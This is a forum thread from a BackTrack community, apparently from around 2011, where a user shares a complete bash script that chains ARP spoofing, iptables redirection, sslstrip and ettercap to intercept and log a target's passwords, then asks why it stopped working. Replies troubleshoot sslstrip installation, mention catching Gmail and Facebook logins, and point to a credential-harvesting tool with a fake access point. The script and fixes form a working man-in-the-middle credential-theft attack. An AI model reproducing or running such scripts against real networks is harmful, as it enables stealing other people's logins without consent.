Page 1 of 2 12 LastLast
Results 1 to 10 of 14

Thread: Ettercap script that workt in BT4 is not getting passwords in BT5

  1. #1
    Just burned his ISO
    Join Date
    Jun 2006
    Posts
    7

    Default Ettercap script that workt in BT4 is not getting passwords in BT5

    Hi everybody,

    In BT4 I had a script to capture passwords with ettercap and sslstrip, this worked fine. But now in BT5 ettercap is not finding the passwords. When I look with wireshark to the pcap file, I can find the passwords in here (https). I searched this forum and google, also tried to reinstall ettercap with the fix so its not crashing anymore, but no luck. Is there someone with the same problem and has a fix?

    Thanks

    Code:
    #!/bin/bash
    echo -n "Enter the name of the interface connected to the internet, for example eth0: "
    read -e IFACE
    echo -n "Enter the IP of the Gateway: "
    read -e GW
    echo -n "Enter the IP of the Target: "
    read -e TA
    echo -n "Use sslstip y/n: "
    read -e SSL
    echo -n "Save all packets in a pcap file y/n: "
    read -e PCAP
    
    #IFACE=wlan0
    #GW=192.168.1.1
    #TA=192.168.1.100
    echo "Start"
    killall -9 sslstrip ettercap
    echo 1 > /proc/sys/net/ipv4/ip_forward
    
    sleep 3
    if [ $SSL = "y" ]; then
    	iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    	xterm -e sslstrip -a -k -f -l 10000 &
    else
    	iptables -F
    fi
    
    sleep 3
    if [ $TA > 0 ]; then
    	#xterm -e ettercap -i $IFACE -Tq -M ARP /$GW/ /$TA/  &
    
    	xterm -e arpspoof -i $IFACE -t $TA $GW & 
    	xterm -e arpspoof -i $IFACE -t $GW $TA & 
    else
    	xterm -e ettercap -i $IFACE -Tq -M ARP /$GW/ // -P autoadd &
    fi
    
    sleep 3
    if [ $PCAP = "y" ]; then
    	xterm -e ettercap -i $IFACE -Tqzu -l cred$(date +%F-%H%M) -w packets$(date +%F-%H%M).pcap &
    else
    	xterm -e ettercap -i $IFACE -Tqzu -l cred$(date +%F-%H%M) &
    fi
    
    
    
    echo "To see the log file"
    echo "#etterlog cred.eci"
    echo "To see the stored creds"
    echo "#etterlog -p cred.eci"

  2. #2
    Just burned his ISO
    Join Date
    May 2011
    Posts
    15

    Default Re: Ettercap script that workt in BT4 is not getting passwords in BT5

    Are you sure that sslstrip is running? When BT5 is first installed, sslstrip won't run with the command "sslstrip". You could do something like "python /pentest/web/sslstrip/sslstrip.py". My preference is to install sslstrip:
    cd /pentest/web/sslstrip
    python setup.py install

    Once the install is done the sslstrip command will work by itself. Also consider updating to sslstrip 0.9. It was released a few days ago and looks like it corrects a few problems including catching gmail logins, which is where I usually do my testing from.

  3. #3
    Just burned his ISO
    Join Date
    Jun 2006
    Posts
    7

    Default Re: Ettercap script that workt in BT4 is not getting passwords in BT5

    Is there no body that had this kind of problems with ettercap?

  4. #4
    Just burned his ISO
    Join Date
    Feb 2011
    Posts
    1

    Default Re: Ettercap script that workt in BT4 is not getting passwords in BT5

    Quote Originally Posted by MadMax0 View Post
    Is there no body that had this kind of problems with ettercap?
    Yep same problem with me too!!!!!!!!!!!!!

  5. #5

    Default Re: Ettercap script that workt in BT4 is not getting passwords in BT5

    Quote Originally Posted by MadMax0 View Post
    Is there no body that had this kind of problems with ettercap?
    Yep im having the same problem here...
    I can sniff almost every traffic but not the user/pass for facebook, gmail...

    I even updated the sslstrip to the 0.9v....

  6. #6
    Just burned his ISO
    Join Date
    May 2011
    Location
    Athens, OH
    Posts
    12

    Default Re: Ettercap script that workt in BT4 is not getting passwords in BT5

    I have had the same problem.

  7. #7
    Senior Member
    Join Date
    Dec 2010
    Posts
    127

    Default Re: Ettercap script that workt in BT4 is not getting passwords in BT5

    I've made a few changes to my easy-creds script. I tested it tonight and seems to be working just fine.

    The original is on sourceforge if you want it. Just search for easy-creds. All you have to do is change the path for sslstrip as noted in the previous posts.

    When I post the new version to SF, I can post here as well.

    Thanks
    J0hnnyBr@v0

  8. #8
    Just burned their ISO Nixguy's Avatar
    Join Date
    Aug 2010
    Location
    North of the south pole
    Posts
    18

    Default Re: Ettercap script that workt in BT4 is not getting passwords in BT5

    Quote Originally Posted by ericmilam View Post
    I've made a few changes to my easy-creds script. I tested it tonight and seems to be working just fine.

    The original is on sourceforge if you want it. Just search for easy-creds. All you have to do is change the path for sslstrip as noted in the previous posts.

    When I post the new version to SF, I can post here as well.

    Thanks
    J0hnnyBr@v0

    i made the changes you talked about, but still not working
    all i get is DHCP [MAC Address] DISCOVERING

    not sure if i'm doing something wrong
    i installed the v0.9 for sslstrip, and i made sure when run from command line it start

    then i ran the script you have, but still no luck

    i also downloaded Easy-cread 3.1, i'm able to see the urls, but ettercap nothing, any suggestions or feedback is appreciated

    Cheers

    Nix
    Last edited by Nixguy; 06-01-2011 at 04:01 AM.

  9. #9
    Senior Member
    Join Date
    Dec 2010
    Posts
    127

    Default Re: Ettercap script that workt in BT4 is not getting passwords in BT5

    All,

    I have updated easy-creds to run on BT5. Mostly path changes, installation of hamster/ferret & dhchp3-server. It's all in the readme file.

    In addition I fixed the IP assignments for FakeAP. Yes, I *really* fixed it this time. Who knew you couldn't have a dhcp config file outside of /etc? I didn't and finally saw the permission denied when trying to run it. Set it to 777, didn't work so I just have the script write a dhcp-ec.conf file in the proper folder and everything is good.

    http://code.google.com/p/easy-creds/downloads/list

    Happy hunting,
    J0hnnyBr@v0

  10. #10
    Senior Member
    Join Date
    Dec 2010
    Posts
    127

    Default Re: Ettercap script that workt in BT4 is not getting passwords in BT5

    Another thing to consider is that SSLStrip may be capturing the info, but ettercap isn't... Did you check the SSLStrip log file?

Page 1 of 2 12 LastLast

Similar Threads

  1. NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh
    By killadaninja in forum BackTrack Howtos
    Replies: 87
    Last Post: 05-01-2011, 11:06 AM
  2. Replies: 44
    Last Post: 04-08-2011, 02:30 AM
  3. Replies: 5
    Last Post: 04-03-2011, 01:54 PM
  4. Is it possible to capture HTTP passwords (Ettercap)
    By OldGregg in forum OLD Newbie Area
    Replies: 8
    Last Post: 07-11-2009, 12:39 PM
  5. ettercap - sniffing works, but I can't see passwords
    By Trick17 in forum OLD BackTrack v2.0 Final
    Replies: 6
    Last Post: 08-29-2007, 09:09 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •